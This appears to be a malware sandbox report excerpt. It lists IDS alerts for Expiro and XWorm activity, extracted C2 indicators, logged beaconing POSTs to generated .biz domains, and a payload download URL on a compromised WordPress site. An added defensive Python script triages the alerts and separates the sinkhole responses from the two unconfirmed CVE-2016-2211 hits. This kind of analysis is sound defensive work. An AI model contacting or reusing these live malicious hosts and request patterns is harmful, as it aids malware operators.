Source: Network traffic Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:55730 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:62117 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:50355 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:60253 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57471 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60791 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:49846 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:56268 -> 82.112.184.197:80
Source: Network traffic Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57634 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:60684 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53706 -> 1.1.1.1:53
Source: Malware configuration extractor URLs: 62.60.190.120
Source: Malware configuration extractor URLs: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown Network traffic detected: DNS query count 129
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0E4B8 InternetCheckConnectionA, 4_2_02B0E4B8
Source: global traffic TCP traffic: 192.168.2.8:49727 -> 62.60.190.120:7923
Source: global traffic DNS traffic detected: number of DNS queries: 129
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49711
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49708
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49708
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.8:49731
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.8:49731
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49711
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.8:49790
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.8:49790
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.8:49749
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.8:49752
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49771
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49771
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.8:49802
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.8:49802
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.8:49779
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.8:49779
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.8:49745
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.8:49745
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49785
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49785
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.8:49752
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.8:49749
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.8:49753
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.8:49753
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49716
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49776
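What the sinkhole alerts above mean, and how to separate them from the one alert that deserves scrutiny, as an added example (the script is not part of the Joe Sandbox report). ET SIDs 2018141 and 2037771 key on the Set-Cookie value (Snkz, btst) that the AnubisNetworks sinkhole returns in its HTTP response; that is why every one of those alerts runs from an external :80 source to the sandbox host 192.168.2.8, and why the eight external addresses are sinkhole IPs rather than a live C2: the names the sample contacted already resolve to a sinkhole operator. The two 2022930 (CVE-2016-2211) hits are a content signature firing on a port-443 session, where the payload is TLS; nothing on this page shows a CAB file, let alone exploitation, so they need pcap confirmation before anyone writes "exploit attempt" in a ticket. The alert lines are copied from the list above; the client address and the response-direction assumption are read off those lines, and the function names are mine.

```python
"""Triage of the Suricata alerts listed above.

Added example, not part of the Joe Sandbox report. It parses the alert
lines, groups them into TCP flows and separates sinkhole-cookie hits
(the destinations are sinkholes, not live C2) from alerts that still
need a human look.
"""
import re

# Constructed sample: the alert lines copied from the report above.
ALERT_LINES = [
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.8:49752",
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49771",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49771",
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.8:49802",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.8:49802",
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.8:49779",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.8:49779",
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.8:49745",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.8:49745",
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49785",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49785",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.8:49752",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.8:49749",
    "Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.8:49753",
    "Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.8:49753",
    "Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49716",
    "Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49776",
]

# ET SIDs for the AnubisNetworks sinkhole cookies (Snkz, btst). These rules
# match the Set-Cookie header in the HTTP *response*, so in the alert the
# sinkhole is the source (:80) and the infected host is the destination.
SINKHOLE_SIDS = {2018141, 2037771}

ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_alert(line):
    """Return the fields of one alert line as a dict, or None for a non-alert line."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    a = m.groupdict()
    for k in ("sid", "sev", "sport", "dport"):
        a[k] = int(a[k])
    return a


def triage(lines, client_ip="192.168.2.8"):
    """Group alerts per flow (keyed by the client's ephemeral port) and classify them."""
    flows = {}
    for a in filter(None, map(parse_alert, lines)):
        # Orient the flow as client -> server whichever side triggered the rule.
        if a["dst"] == client_ip:
            key, server, server_port = a["dport"], a["src"], a["sport"]
        else:
            key, server, server_port = a["sport"], a["dst"], a["dport"]
        flow = flows.setdefault(key, {"server": server, "server_port": server_port, "sids": set()})
        flow["sids"].add(a["sid"])

    sinkhole_ips = sorted({f["server"] for f in flows.values() if f["sids"] & SINKHOLE_SIDS})
    both_cookies = sum(SINKHOLE_SIDS <= f["sids"] for f in flows.values())
    needs_review = []
    for port, f in sorted(flows.items()):
        if f["sids"] & SINKHOLE_SIDS:
            continue  # sinkhole response: infection confirmed, C2 is not live
        note = ("content signature fired on a TLS port; the payload is encrypted, "
                "so confirm in the pcap before calling it exploitation"
                if f["server_port"] == 443 else "non-sinkhole alert; review")
        needs_review.append({"client_port": port, "server": f["server"],
                             "server_port": f["server_port"],
                             "sids": sorted(f["sids"]), "note": note})
    return {"flows": len(flows), "sinkhole_ips": sinkhole_ips,
            "both_cookies": both_cookies, "needs_review": needs_review}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(ALERT_LINES), indent=2))
```

Run as-is it reports ten flows, eight sinkhole addresses (seven flows set both cookies, the 13.251.16.150 flow only btst) and two flows to 4.245.163.56:443 flagged for review. Feeding it a live Suricata fast.log needs only a different regex; the flow-orientation logic is the part worth keeping.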
Source: global traffic HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: chichometextiles.com
Source: global traffic HTTP traffic detected: POST /xvpanbchxym HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ks HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /iwwaryskplxdjo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ludmpidgkyjmk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /i HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pywymqfnuombtvtm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /luqhjxxa HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fnl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ln HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /uqcynitxoaix HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rlj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rwebgnmbtiq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hmsaqgigfaxqle HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gcpevfxhbnb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /tpnpycqre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /idnuv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ifmujtvaxdtknray HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /f HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qrcvkhcipj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /lurykvmwmoqvfvd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /p HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ou HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rnsuojk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /shc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vhkhfdko HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xnnwo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /iobhvfdyhggtu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /mbh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /sjajebqyfvuqndq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /dujlogesynfu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qautyxiqxdcgavi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vdvikkmvoibst HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /go HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
